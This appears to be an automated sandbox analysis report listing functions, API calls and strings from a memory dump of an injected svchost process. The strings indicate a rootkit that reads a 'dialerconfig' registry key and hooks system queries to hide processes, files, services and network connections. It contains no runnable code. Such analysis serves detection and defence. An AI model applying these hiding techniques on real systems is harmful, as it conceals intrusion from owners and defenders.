Part of subcall function 000002062E991274: HeapAlloc.KERNEL32 ref: 000002062E9912B4

RegOpenKeyExW.ADVAPI32 ref: 000002062E9916DA
RegOpenKeyExW.ADVAPI32 ref: 000002062E991707
RegCloseKey.ADVAPI32 ref: 000002062E991721
RegOpenKeyExW.ADVAPI32 ref: 000002062E991741
RegCloseKey.ADVAPI32 ref: 000002062E99175C
RegOpenKeyExW.ADVAPI32 ref: 000002062E99177C
RegCloseKey.ADVAPI32 ref: 000002062E991797
RegOpenKeyExW.ADVAPI32 ref: 000002062E9917B7
RegCloseKey.ADVAPI32 ref: 000002062E9917D2
RegOpenKeyExW.ADVAPI32 ref: 000002062E9917F2
RegCloseKey.ADVAPI32 ref: 000002062E99180D
RegOpenKeyExW.ADVAPI32 ref: 000002062E99182D
RegCloseKey.ADVAPI32 ref: 000002062E991848
RegOpenKeyExW.ADVAPI32 ref: 000002062E991868
RegCloseKey.ADVAPI32 ref: 000002062E991883
RegOpenKeyExW.ADVAPI32 ref: 000002062E9918A3
RegCloseKey.ADVAPI32 ref: 000002062E9918BE
RegCloseKey.ADVAPI32 ref: 000002062E9918C8

Part of subcall function 000002062E9912C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002062E991326
Part of subcall function 000002062E9912C8: GetProcessHeap.KERNEL32 ref: 000002062E991334
Part of subcall function 000002062E9912C8: HeapAlloc.KERNEL32 ref: 000002062E991345
Part of subcall function 000002062E9912C8: RegEnumValueW.ADVAPI32 ref: 000002062E9913A1
Part of subcall function 000002062E9912C8: GetProcessHeap.KERNEL32 ref: 000002062E9913E9
Part of subcall function 000002062E9912C8: HeapAlloc.KERNEL32 ref: 000002062E9913F7
Part of subcall function 000002062E9912C8: GetProcessHeap.KERNEL32 ref: 000002062E99141B
Part of subcall function 000002062E9912C8: HeapFree.KERNEL32 ref: 000002062E991429
Part of subcall function 000002062E9912C8: lstrlenW.KERNEL32 ref: 000002062E991432
Part of subcall function 000002062E9912C8: GetProcessHeap.KERNEL32 ref: 000002062E991440
Part of subcall function 000002062E9912C8: HeapAlloc.KERNEL32 ref: 000002062E99144E

Strings

startup, xrefs: 000002062E9916FD
pid, xrefs: 000002062E99173A
paths, xrefs: 000002062E9917B0
udp, xrefs: 000002062E99189C
SOFTWARE\dialerconfig, xrefs: 000002062E9916BA
process_names, xrefs: 000002062E991775
service_names, xrefs: 000002062E9917EB
tcp_local, xrefs: 000002062E991826
tcp_remote, xrefs: 000002062E991861

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: d76f8257f7edd35e035c630aa4bc2945f366138947c184975446f9139cdc0fb9
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: D8711B76B10B509EEB10DFA6E84C69D27A4FB89B88F015132DE4D47B6ADF38C4A4C710

Function 000002062E993458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002062E99347A
PathFindFileNameW.SHLWAPI ref: 000002062E993489

Part of subcall function 000002062E993930: StrCmpNIW.SHLWAPI ref: 000002062E993948

Part of subcall function 000002062E993878: GetModuleHandleW.KERNEL32 ref: 000002062E993886
Part of subcall function 000002062E993878: GetCurrentProcess.KERNEL32 ref: 000002062E9938B4
Part of subcall function 000002062E993878: VirtualProtectEx.KERNEL32 ref: 000002062E9938D6
Part of subcall function 000002062E993878: GetCurrentProcess.KERNEL32 ref: 000002062E9938F4
Part of subcall function 000002062E993878: VirtualProtectEx.KERNEL32 ref: 000002062E993915

CreateThread.KERNEL32 ref: 000002062E9934D7

Part of subcall function 000002062E991EB4: GetCurrentThread.KERNEL32 ref: 000002062E991EBF

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 22da26e774a07ff888ad0170a9c416058b5212f88a11fd6c54b6d8d96ecba110
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 4A115770E207119EFB21DBE1A90E3A923A4BB54344F45803B9E4686397EF39C4E48612

Function 000002062E991C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002062E991650: GetProcessHeap.KERNEL32 ref: 000002062E99165B
Part of subcall function 000002062E991650: HeapAlloc.KERNEL32 ref: 000002062E99166A
Part of subcall function 000002062E991650: RegOpenKeyExW.ADVAPI32 ref: 000002062E9916DA
Part of subcall function 000002062E991650: RegOpenKeyExW.ADVAPI32 ref: 000002062E991707
Part of subcall function 000002062E991650: RegCloseKey.ADVAPI32 ref: 000002062E991721
Part of subcall function 000002062E991650: RegOpenKeyExW.ADVAPI32 ref: 000002062E991741
Part of subcall function 000002062E991650: RegCloseKey.ADVAPI32 ref: 000002062E99175C
Part of subcall function 000002062E991650: RegOpenKeyExW.ADVAPI32 ref: 000002062E99177C
Part of subcall function 000002062E991650: RegCloseKey.ADVAPI32 ref: 000002062E991797
Part of subcall function 000002062E991650: RegOpenKeyExW.ADVAPI32 ref: 000002062E9917B7
Part of subcall function 000002062E991650: RegCloseKey.ADVAPI32 ref: 000002062E9917D2
Part of subcall function 000002062E991650: RegOpenKeyExW.ADVAPI32 ref: 000002062E9917F2

Sleep.KERNEL32 ref: 000002062E991C43
SleepEx.KERNELBASE ref: 000002062E991C49

Part of subcall function 000002062E991650: RegCloseKey.ADVAPI32 ref: 000002062E99180D
Part of subcall function 000002062E991650: RegOpenKeyExW.ADVAPI32 ref: 000002062E99182D
Part of subcall function 000002062E991650: RegCloseKey.ADVAPI32 ref: 000002062E991848
Part of subcall function 000002062E991650: RegOpenKeyExW.ADVAPI32 ref: 000002062E991868
Part of subcall function 000002062E991650: RegCloseKey.ADVAPI32 ref: 000002062E991883
Part of subcall function 000002062E991650: RegOpenKeyExW.ADVAPI32 ref: 000002062E9918A3
Part of subcall function 000002062E991650: RegCloseKey.ADVAPI32 ref: 000002062E9918BE
Part of subcall function 000002062E991650: RegCloseKey.ADVAPI32 ref: 000002062E9918C8

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 8cc189c61554a6116777c939b63af7c8fd42e59a6143663591b9ac37b408217f
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: B731C065A007019DFB549FA7D54D35E13A4BB44BC0F0690339E49877A7EF24C4F0CA61

Function 000002062E962908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002062E962A31

Memory Dump Source

Source File: 00000021.00000002.1988921290.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e960000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: fb6ff1189ae488b920dd8053fc41b7c032eb8c3e00da1f9a4e2458ba651b31a0
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: E561DE22B017528BEA68CFA5948C769B395FB44B94F548137DE1D077C6DA38E8A2C740

Non-executed Functions

Function 000002062E992CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002062E992D80
lstrlenW.KERNEL32 ref: 000002062E992FBA

Part of subcall function 000002062E991A14: OpenProcess.KERNEL32 ref: 000002062E991A3A
Part of subcall function 000002062E991A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002062E991A58
Part of subcall function 000002062E991A14: PathFindFileNameW.SHLWAPI ref: 000002062E991A67
Part of subcall function 000002062E991A14: lstrlenW.KERNEL32 ref: 000002062E991A73
Part of subcall function 000002062E991A14: StrCpyW.SHLWAPI ref: 000002062E991A86
Part of subcall function 000002062E991A14: CloseHandle.KERNEL32 ref: 000002062E991A94

GetProcAddress.KERNEL32 ref: 000002062E992D95

Part of subcall function 000002062E991554: StrCmpIW.SHLWAPI ref: 000002062E991585

Part of subcall function 000002062E993930: StrCmpNIW.SHLWAPI ref: 000002062E993948

StrCmpNIW.SHLWAPI ref: 000002062E992DD8
lstrlenW.KERNEL32 ref: 000002062E992F00

Strings

NtQueryObject, xrefs: 000002062E992D8B
\Device\Nsi, xrefs: 000002062E992DCB
ntdll.dll, xrefs: 000002062E992D79

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: ce952d3e73d938563169e58bb4713985e3beafe87470db74d20ef98a094c54c2
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 8EB19C62A10B508EEB68CFA6E44C7A963A4FB44B84F549027EE4D57796DB35CDE0C340

Function 000002062E997E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002062E997E8C
RtlCaptureContext.NTDLL ref: 000002062E997EB9
RtlLookupFunctionEntry.NTDLL ref: 000002062E997ED3
RtlVirtualUnwind.NTDLL ref: 000002062E997F14
IsDebuggerPresent.KERNEL32 ref: 000002062E997F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002062E997F89
UnhandledExceptionFilter.KERNEL32 ref: 000002062E997F94

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 4dfcc92da8492d839a30b76332f4facbbcccf0a1392051a9e2acdb963ce8b203
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: FC314F72A05B809EEB60DFA0E8487ED7365F784744F44442ADE4D57B99EF38C598C710

Function 000002062E99B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002062E99B585
RtlLookupFunctionEntry.NTDLL ref: 000002062E99B59D
RtlVirtualUnwind.NTDLL ref: 000002062E99B5D8
IsDebuggerPresent.KERNEL32 ref: 000002062E99B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002062E99B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002062E99B626

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: b757159b27260cb37858a3827974c3183dc131d5d78c550370bdbb30484b6778
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 40319532A14F809EDB60CF65E84839E73A4F789754F504526EE9D43B59EF38C595CB00

Function 000002062E99FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002062E99FF67
WriteFile.KERNEL32 ref: 000002062E9A021E
WriteFile.KERNEL32 ref: 000002062E9A0270
GetLastError.KERNEL32 ref: 000002062E9A0372
GetLastError.KERNEL32 ref: 000002062E9A03D2

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: a2805b584be6008d54e9b537801dd49c8f72fec32c09152e48c9d243651f1f31
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: FEE1E072F14B809EE700CFA4D48C2DD7BB1F749788F148126DE4A57B9ADA38C4AAC701

Function 000002062E9912C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002062E991326
GetProcessHeap.KERNEL32 ref: 000002062E991334
HeapAlloc.KERNEL32 ref: 000002062E991345
RegEnumValueW.ADVAPI32 ref: 000002062E9913A1

Part of subcall function 000002062E991554: StrCmpIW.SHLWAPI ref: 000002062E991585

GetProcessHeap.KERNEL32 ref: 000002062E9913E9
HeapAlloc.KERNEL32 ref: 000002062E9913F7
GetProcessHeap.KERNEL32 ref: 000002062E99141B
HeapFree.KERNEL32 ref: 000002062E991429
lstrlenW.KERNEL32 ref: 000002062E991432
GetProcessHeap.KERNEL32 ref: 000002062E991440
HeapAlloc.KERNEL32 ref: 000002062E99144E
StrCpyW.SHLWAPI ref: 000002062E991470
GetProcessHeap.KERNEL32 ref: 000002062E991485
HeapFree.KERNEL32 ref: 000002062E991493

Strings

d, xrefs: 000002062E991365

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: a87e725cd32583367e7bf23179a45447b238c6c48a6a876c6e3143f4f31693e4
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: B5515A72A54B44DBEB14CFA2E54C39EB3A1F789B80F458126DE4947B15DF38C4A5CB00

Function 000002062E991EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002062E991EBF

Part of subcall function 000002062E992174: GetModuleHandleA.KERNEL32 ref: 000002062E99218C
Part of subcall function 000002062E992174: GetProcAddress.KERNEL32 ref: 000002062E99219D

Part of subcall function 000002062E995C10: GetCurrentThreadId.KERNEL32 ref: 000002062E995C4B

Strings

NtQuerySystemInformation, xrefs: 000002062E991EE5
NtEnumerateValueKey, xrefs: 000002062E991F76
NtQueryDirectoryFileEx, xrefs: 000002062E991F3C
NtDeviceIoControlFile, xrefs: 000002062E991FF6
NtQueryDirectoryFile, xrefs: 000002062E991F1F
advapi32.dll, xrefs: 000002062E991F97, 000002062E991FB8
ntdll.dll, xrefs: 000002062E991ECD
sechost.dll, xrefs: 000002062E991FD9
EnumServiceGroupW, xrefs: 000002062E991F90
NtResumeThread, xrefs: 000002062E991F02
EnumServicesStatusExW, xrefs: 000002062E991FB1, 000002062E991FD2
NtEnumerateKey, xrefs: 000002062E991F59

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 838c7a56c3d3f5106f52aa5eedd34e9585fdeb10c641bd43d31e9ff5dd4c000e
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 8731A664E41B4AADEF54DFE5F85D6D42339AB84344F8084339D1D022679E7882FDC352

Function 000002062E9923F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002062E992405
GetCurrentProcessId.KERNEL32 ref: 000002062E99240F

Part of subcall function 000002062E9919AC: OpenProcess.KERNEL32 ref: 000002062E9919CA
Part of subcall function 000002062E9919AC: IsWow64Process.KERNEL32 ref: 000002062E9919E0
Part of subcall function 000002062E9919AC: CloseHandle.KERNEL32 ref: 000002062E9919FB

CreateFileW.KERNEL32 ref: 000002062E992468
WriteFile.KERNEL32 ref: 000002062E992490
ReadFile.KERNEL32 ref: 000002062E9924AF
CloseHandle.KERNEL32 ref: 000002062E9924B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 000002062E992438
\\.\pipe\dialerchildproc32, xrefs: 000002062E99243F

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: b15ad22cca17d60b654c6fa68bdfd0b0582744568221a38c8e10ce781aabfec0
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: EB213A76A14B409BEB10CB65F44C36E73A1F789BA4F544226EE5902BA9CF7CC199CB01

Function 000002062E99104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002062E9910AB
RegEnumValueW.ADVAPI32 ref: 000002062E99110E
GetProcessHeap.KERNEL32 ref: 000002062E991155
HeapAlloc.KERNEL32 ref: 000002062E991163
GetProcessHeap.KERNEL32 ref: 000002062E991187
HeapFree.KERNEL32 ref: 000002062E991195

Strings

d, xrefs: 000002062E9910CE

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: e3f5430690d92846fdc9a3bbc4b748f91aa3d7c9106756ed56f6789667c66354
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 4E414E73A14B809BE764CF92E44879EB7A1F389B84F008126DF8907B59DF38D5A5CB00

Function 000002062E9975F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002062E997618
__scrt_acquire_startup_lock.LIBCMT ref: 000002062E99766A
_RTC_Initialize.LIBCMT ref: 000002062E997698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002062E9976BE
__scrt_release_startup_lock.LIBCMT ref: 000002062E9976E9

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 6194c154232ae3557b7e71095cd88d7710f323b6032c24a8e53e9da6fffd5ef5
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 3181A321F047418EFB54ABEA988D3A962D4AB85B80F58CC379D0947797DF3AC8F18711

Function 000002062E9669F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002062E966A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002062E966A6A
_RTC_Initialize.LIBCMT ref: 000002062E966A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002062E966ABE
__scrt_release_startup_lock.LIBCMT ref: 000002062E966AE9

Memory Dump Source

Source File: 00000021.00000002.1988921290.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e960000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 70aef52b29c0cb9ba5745c9ea26b6b0ababbfc1d65715707593eeef5466c9494
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 6D81B3B1F147438EFA60AFE9944D39966D0EB85780F448037AE4947797DB39C8F58780

Function 000002062E999804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 000002062E999889
GetLastError.KERNEL32 ref: 000002062E999897
LoadLibraryExW.KERNEL32 ref: 000002062E9998C1
FreeLibrary.KERNEL32 ref: 000002062E999907
GetProcAddress.KERNEL32 ref: 000002062E999913

Strings

api-ms-, xrefs: 000002062E9998A9

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: a2ea0501bb89120d43f18ed7951df64a7f5cfd25a1ba553a5154b1eed85166f0
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: EF319431B12B509DFE15DB92A80C79963A4FB49BA0F59853ADD2D4B396EF38C4E5C300

Function 000002062E9A1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 000002062E9A1BCD
GetLastError.KERNEL32 ref: 000002062E9A1BD9
CloseHandle.KERNEL32 ref: 000002062E9A1BF1
CreateFileW.KERNEL32 ref: 000002062E9A1C1C
WriteConsoleW.KERNEL32 ref: 000002062E9A1C3B

Strings

CONOUT$, xrefs: 000002062E9A1BFD

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 3e92b76dd3d5735f73fa48901b18439f2b965b1e7052f6aaacdd5835120e0d75
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 7D11BF61F54B508AE7508B86E84C319B2A0FB89FE4F004236EE5D87795CF78C9A48745

Function 000002062E995C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002062E995C4B
GetThreadContext.KERNEL32 ref: 000002062E995DB5

Part of subcall function 000002062E995A40: GetCurrentThreadId.KERNEL32 ref: 000002062E995A44

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 95587a320da4c8f2e377417ffd6fd375dae5c71425a42fb5ac44eb303f32603f
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: D6D1C076605B888ADB70DB59E49835A77A0F7C8B88F104122EECD47BA6DF3DC591CB10

Function 000002062E9930B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002062E9930D7
HeapAlloc.KERNEL32 ref: 000002062E9930EA
StrCmpNIW.SHLWAPI ref: 000002062E99316B
GetProcessHeap.KERNEL32 ref: 000002062E9931D1
HeapFree.KERNEL32 ref: 000002062E9931DF

Strings

dialer, xrefs: 000002062E993164

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 08b9a286cfe33cc7482b55b06d755b28743ccff3fcf7075b705e5f2b22f96cbd
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: D7318221F01B55DEEB65DF96A84C669A3A0FB44B84F08C1329E8907B66EF38D4F1C700

Function 000002062E991A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002062E991A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002062E991A58
